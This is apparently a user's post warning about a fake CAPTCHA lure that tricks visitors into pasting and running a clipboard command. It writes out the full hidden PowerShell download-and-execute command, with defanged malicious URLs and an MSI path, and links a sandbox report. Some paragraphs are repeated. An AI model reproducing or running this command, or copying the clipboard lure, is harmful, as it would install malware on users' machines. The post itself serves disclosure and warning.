Interesting bit starts around 0:32 (ain't nobody got time for this, right?)
This shows how malware pops up a dialog to "verify you are human"; something we've all seen in various different permutations. Sometimes we need to click all stoplights, sometimes we need to do a simple math problem or decipher hard to read text. This time you're being asked to enter a key combination (Win+R, then CTRL+V then Enter) which will paste a command that downloads and installs malware. The command has been sneakily put on the clipboard just earlier by the website.
This downloads malware from https:\\qq51f.short.gy/1 which redirects to https:\\bestiamos.com/91.brr which is then saved as c:\users\public\3aw.msi and run.
(Url's are made invalid by replacing // with \\ deliberately)
This shows how malware pops up a dialog to "verify you are human"; something we've all seen in various different permutations. Sometimes we need to click all stoplights, sometimes we need to do a simple math problem or decipher hard to read text. This time you're being asked to enter a key combination (Win+R, then CTRL+V then Enter) which will paste a command that downloads and installs malware. The command has been sneakily put on the clipboard just earlier by the website.
The command (DON'T RUN THIS) is as follows:
cmd /c start /min powershell -NoProfile -WindowStyle Hidden -Command $path='c:\\users\\public\\3aw.msi'; Invoke-RestMethod -Uri 'https:\\qq51f.short.gy/1' -OutFile $path; Start-Process $path;
This downloads malware from https:\\qq51f.short.gy/1 which redirects to https:\\bestiamos.com/91.brr which is then saved as c:\users\public\3aw.msi and run.
(Url's are made invalid by replacing // with \\ deliberately)
First mention I could find was feb. 18th: https://any.run/report/e9af23d9fde13156ade19368fd8c2766fe8f1...
Maybe this is as old as Rome, but for me it's a first.